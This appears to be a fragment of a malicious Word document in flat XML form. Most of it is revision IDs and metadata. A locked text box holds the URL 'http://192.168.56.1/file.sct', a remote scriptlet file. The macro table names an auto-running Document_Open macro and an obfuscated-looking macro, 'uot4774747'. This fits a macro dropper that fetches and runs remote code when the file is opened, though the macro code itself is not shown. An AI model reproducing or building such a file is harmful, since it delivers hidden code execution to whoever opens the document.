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alias w:val="TextBox"/>
        <w:tag w:val="content_name"/>
        <w:id w:val="-331373245"/>
        <w:lock w:val="sdtLocked"/>
        <w:placeholder>
          <w:docPart w:val="866130A900F343ADB98BC2E9FB45811A"/>
        </w:placeholder>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w:rsidR="00CB25E1" w:rsidRDefault="00A10857">
          <w:r>
            <w:t>http://192.168.56.1/file.sct</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sectPr w:rsidR="00CB25E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54DD"/>
    <w:rsid w:val="00071A0D"/>
    <w:rsid w:val="00081FB1"/>
    <w:rsid w:val="000C781A"/>
    <w:rsid w:val="00104DDF"/>
    <w:rsid w:val="001159C8"/>
    <w:rsid w:val="0018347C"/>
    <w:rsid w:val="001F5457"/>
    <w:rsid w:val="0021119E"/>
    <w:rsid w:val="00217814"/>
    <w:rsid w:val="002743FA"/>
    <w:rsid w:val="002825B1"/>
    <w:rsid w:val="002C5E84"/>
    <w:rsid w:val="002D1223"/>
    <w:rsid w:val="002D54DD"/>
    <w:rsid w:val="002F255A"/>
    <w:rsid w:val="00333E61"/>
    <w:rsid w:val="00340C14"/>
    <w:rsid w:val="00342F78"/>
    <w:rsid w:val="00344BCD"/>
    <w:rsid w:val="0036702F"/>
    <w:rsid w:val="003D46CE"/>
    <w:rsid w:val="003F0F8B"/>
    <w:rsid w:val="0041250D"/>
    <w:rsid w:val="00442453"/>
    <w:rsid w:val="004505EB"/>
    <w:rsid w:val="00454884"/>
    <w:rsid w:val="004A1D7A"/>
    <w:rsid w:val="00512254"/>
    <w:rsid w:val="0055253E"/>
    <w:rsid w:val="00556DBB"/>
    <w:rsid w:val="005810B3"/>
    <w:rsid w:val="00591F52"/>
    <w:rsid w:val="005B70B7"/>
    <w:rsid w:val="005C4F19"/>
    <w:rsid w:val="005D24BE"/>
    <w:rsid w:val="005F462F"/>
    <w:rsid w:val="00604262"/>
    <w:rsid w:val="00624050"/>
    <w:rsid w:val="00634831"/>
    <w:rsid w:val="0066644D"/>
    <w:rsid w:val="006763A2"/>
    <w:rsid w:val="00714904"/>
    <w:rsid w:val="007163BF"/>
    <w:rsid w:val="00722802"/>
    <w:rsid w:val="00734556"/>
    <w:rsid w:val="00765738"/>
    <w:rsid w:val="007B5FA2"/>
    <w:rsid w:val="007C14E1"/>
    <w:rsid w:val="00887ED5"/>
    <w:rsid w:val="00891AE2"/>
    <w:rsid w:val="008B29C2"/>
    <w:rsid w:val="008E497A"/>
    <w:rsid w:val="00940F2B"/>
    <w:rsid w:val="00944D9F"/>
    <w:rsid w:val="00956DE4"/>
    <w:rsid w:val="00957C70"/>
    <w:rsid w:val="00994547"/>
    <w:rsid w:val="009E6E1F"/>
    <w:rsid w:val="009F405A"/>
    <w:rsid w:val="00A10857"/>
    <w:rsid w:val="00A23B1C"/>
    <w:rsid w:val="00A30A1B"/>
    <w:rsid w:val="00A66234"/>
    <w:rsid w:val="00A66E12"/>
    <w:rsid w:val="00A958A6"/>
    <w:rsid w:val="00AD0F44"/>
    <w:rsid w:val="00AD20A4"/>
    <w:rsid w:val="00B221B2"/>
    <w:rsid w:val="00B414A7"/>
    <w:rsid w:val="00B533F7"/>
    <w:rsid w:val="00B85ECC"/>
    <w:rsid w:val="00BD7FC4"/>
    <w:rsid w:val="00C1227D"/>
    <w:rsid w:val="00C27ABB"/>
    <w:rsid w:val="00C31231"/>
    <w:rsid w:val="00C65AB3"/>
    <w:rsid w:val="00C70E0A"/>
    <w:rsid w:val="00CA709D"/>
    <w:rsid w:val="00CB25E1"/>
    <w:rsid w:val="00CD1882"/>
    <w:rsid w:val="00CF4261"/>
    <w:rsid w:val="00D1084B"/>
    <w:rsid w:val="00D1132E"/>
    <w:rsid w:val="00D12EE6"/>
    <w:rsid w:val="00D21916"/>
    <w:rsid w:val="00D257B0"/>
    <w:rsid w:val="00D67249"/>
    <w:rsid w:val="00DA361C"/>
    <w:rsid w:val="00DF04D5"/>
    <w:rsid w:val="00E107B9"/>
    <w:rsid w:val="00E118ED"/>
    <w:rsid w:val="00EA0651"/>
    <w:rsid w:val="00EB17DB"/>
    <w:rsid w:val="00EB4937"/>
    <w:rsid w:val="00EB75F4"/>
    <w:rsid w:val="00EE0141"/>
    <w:rsid w:val="00EE2798"/>
    <w:rsid w:val="00EF2169"/>
    <w:rsid w:val="00F20133"/>
    <w:rsid w:val="00F211D8"/>
    <w:rsid w:val="00F2175C"/>
    <w:rsid w:val="00F23425"/>
    <w:rsid w:val="00F47CDE"/>
    <w:rsid w:val="00F65493"/>
    <w:rsid w:val="00F77095"/>
    <w:rsid w:val="00FA42BC"/>
    <w:rsid w:val="00FD6236"/>
    <w:rsid w:val="00FF2B98"/>
    <w:rsid w:val="00FF5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OCUMENT_OPEN" wne:name="Project.ThisDocument.Document_Open" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.THISDOCUMENT.UOT47747474" wne:name="Project.ThisDocument.uot4774747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66130A900F343ADB98BC2E9FB4581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C00954-BADD-456A-AC35-E24A91D7102F}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00E93BD3" w:rsidRDefault="004B6056" w:rsidP="004B6056">
          <w:pPr>
            <w:pStyle w:val="866130A900F343ADB98BC2E9FB45811A2"/>
          </w:pPr>
          <w:r w:rsidRPr="008A4C62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282C"/>
    <w:rsid w:val="0045325F"/>
    <w:rsid w:val="004B6056"/>
    <w:rsid w:val="007A6074"/>
    <w:rsid w:val="008676DB"/>
    <w:rsid w:val="008A3654"/>
    <w:rsid w:val="00A3602B"/>
    <w:rsid w:val="00A66FE8"/>
    <w:rsid w:val="00A8282C"/>
    <w:rsid w:val="00BF26CB"/>
    <w:rsid w:val="00E93BD3"/>
    <w:rsid w:val="00F36991"/>
    <w:rsid w:val="00F67F4F"/>
    <w:rsid w:val="00F876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Voice1_185_14</Template>
  <TotalTime>0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truth</dc:creator>
  <cp:lastModifiedBy>Failure</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-18T14:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-18T14:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>